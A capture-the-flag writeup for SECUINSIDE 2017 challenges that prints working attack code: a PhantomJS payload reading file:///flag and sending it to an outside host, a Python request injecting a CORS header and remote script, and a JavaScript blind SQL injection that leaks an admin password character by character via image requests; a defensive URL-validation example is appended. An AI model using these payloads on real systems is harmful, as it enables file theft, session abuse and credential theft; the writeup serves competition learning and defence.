SECUINSIDE Challenge Writeup

source code

https://github.com/junorouse/secuinside2017-pwn1
https://github.com/junorouse/secuinside2017-web1
https://github.com/junorouse/secuinside2017-web-2

phantom of the opera

desc: caches are deleted every 3 minutes.

Cache this file, then load http/../cache/4b975377a178a70030f2a85daf497836.html

http://junan.io/exploit/last.html

cache/4b975377a178a70030f2a85daf497836.html

<!DOCTYPE html><body><script src=http://code.jquery.com/jquery-3.2.1.min.js></script><script>$.ajax({url:"file:///flag",success:function(a){(new Image).src="http://junan.io/flag_"+a},async:!1}),console.log("A")</script>

52.78.36.198 - - [28/Jun/2017:21:12:01 -0400] "GET /flag_SECU[flag] HTTP/1.1" 404 152 "-" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"

file:// <-> file:// (Same origin)
relative path without file protocol --> file://[relative path]

flag : SECU[In sl33p h3 s4ng t0 m3, in dr34m5 h3 c4m3]
flag: SECU[phantom_js_is_magicalllllll~!@~!]
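
A defensive counterpart to the notes above, as an added example that is not part of the original writeup or the challenge source: validating a submitted URL before a headless-browser bot opens it, so that schemeless input is rejected instead of being resolved as a local file path. It assumes the bot passes the submitted string straight to the browser and that validation runs in Node; `validateBotUrl` and `ALLOWED_SCHEMES` are hypothetical names.

```javascript
// Added example (not from the challenge source): validate a user-submitted
// URL before handing it to a headless browser such as PhantomJS.
// validateBotUrl and ALLOWED_SCHEMES are hypothetical names.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function validateBotUrl(input) {
  if (typeof input !== "string" || input.trim() === "") {
    return { ok: false, reason: "empty" };
  }
  let parsed;
  try {
    // No base URL is supplied on purpose: schemeless input such as
    // "http/../cache/x.html" throws here instead of being treated
    // as a relative path (which the browser would load via file://).
    parsed = new URL(input.trim());
  } catch (e) {
    return { ok: false, reason: "not an absolute URL" };
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return { ok: false, reason: "scheme " + parsed.protocol + " not allowed" };
  }
  // Return the normalized href; the bot should open this, never the raw input.
  return { ok: true, url: parsed.href };
}

// Sample inputs: the first three appear in the writeup, the last is constructed.
const samples = [
  "http/../cache/4b975377a178a70030f2a85daf497836.html",
  "file:///flag",
  "http://junan.io/exploit/last.html",
  "   ",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "->", JSON.stringify(validateBotUrl(s)));
}
```

Scheme validation alone does not stop a remote http page from being same-origin with local files once it has been loaded from disk, so the cache directory should also be kept out of any path the browser can open.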

Pine Apple CS

from requests import post

headers = {
    'Cookie': 'token=a6de6ffba2040055e3ba861aae1f9953012c48cc; user_id=junoim;'
}

# 'title' contains a newline followed by an Access-Control-Allow-Origin header line.
data = {
    'title': 'last\nAccess-Control-Allow-Origin: *\n',
    'content': '''
	<script src="//code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="http://junan.io/exploit/exp.js"></script>
'''
}

c = post("http://pine-apple.kr/support.php", headers=headers, data=data)

print(c.content)

//http://52.78.46.132/read.php?idx_token=d83ef283f340426486f9befde2381d1c83fa40dd
// go(i, j): tests whether character j of the admin password has ASCII code i.
function go(i, j) {
    var token = "9974370887355d2388f8044de58eac6db0ce50b2";
    $.ajax({
        type: 'get',
        url: "http://localhost/admin/read.php?idx_token="+token+"%27%20%26%26%20(ascii(substr((select user_pw from users where user_id='admin'),"+j+",1)))="+i+"%23",
        //url: 'http://localhost/admin/read.php?idx_token'
        async: false,
        success: function(data) {
            // Report the candidate character through an image request.
            var x = new Image();
            x.src = 'http://junan.io/x_'+String.fromCharCode(i);
            console.log(data);
        },
        error: function(err) {
            // var x = new Image();
            // x.src='http://junan.io/x_error';
        }
    });
}

var j = 2; // bsqli index

// Try every printable ASCII code for position j.
for (var i = 32; i < 127; i++) {
    go(i, j);
}

origin: localhost != 127.0.0.1

flag : SECU[D0_U_L1K3_X55_C4LLS?]

Kimchi-Vm

caches are deleted every minutes.

Binja's Exploit

Reversing

Pwnable

reversing flag : SECU[I have gold medal in AcM ICPC]
pwnable flag : SECU[You pwned my k-vm system bb]
